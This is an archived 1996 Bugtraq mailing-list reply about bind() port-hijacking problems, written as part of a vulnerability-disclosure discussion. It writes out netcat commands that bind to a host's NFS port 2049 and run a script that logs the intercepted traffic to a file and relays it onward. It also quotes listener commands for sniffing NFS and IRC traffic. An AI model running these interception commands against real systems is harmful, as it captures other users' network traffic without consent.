Re: BoS: bind() Security Problems

invalid opcode (coredump@nervosa.com)
Thu, 1 Feb 1996 21:39:18 -0800

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: General Scirocco: "Re: bind() Security Problems"
Previous message: Casper Dik: "Re: bind() Security Problems"
In reply to: Darren Reed: "Re: BoS: bind() Security Problems"
Next in thread: Darren Reed: "Re: BoS: bind() Security Problems"
Next in thread: Richard Black: "Re: bind() Security Problems"

Yes, but if you do this:
netcat -lvv -s 192.88.209.5 -p 2049 -e exploit.sh&

exploit.sh:
tee crap | netcat 192.88.209.5 2049

and than you can capture it all to the file: crap, and redirect it to the
original port.

Chris,
coredump@nervosa.com

On Thu, 1 Feb 1996, Darren Reed wrote:

> In some mail from Bernd Lehle, sie said:
> [...]
> > > Exploit:
> > [..]
> > > Run netcat:
> > >
> > > w00p% nc -v -v -u -s 192.88.209.5 -p 2049
> > > listening on [192.88.209.5] 2049 ...
> >
> > To take a look at irc packets: nc -v -v -l -s Your.IP.Adress -p 6667
>
> This won't get you messages between already connected clients and servers.
>
> Yes, you might be able to make clients connect, at first, to you and not
> a real server, but it is going to be obvious to the client: the connection
> won't complete as netcat won't generate the server replies which many
> clients now look for to indicate the confirmation of a connection.
>

Next message: General Scirocco: "Re: bind() Security Problems"
Previous message: Casper Dik: "Re: bind() Security Problems"
In reply to: Darren Reed: "Re: BoS: bind() Security Problems"
Next in thread: Darren Reed: "Re: BoS: bind() Security Problems"
Next in thread: Richard Black: "Re: bind() Security Problems"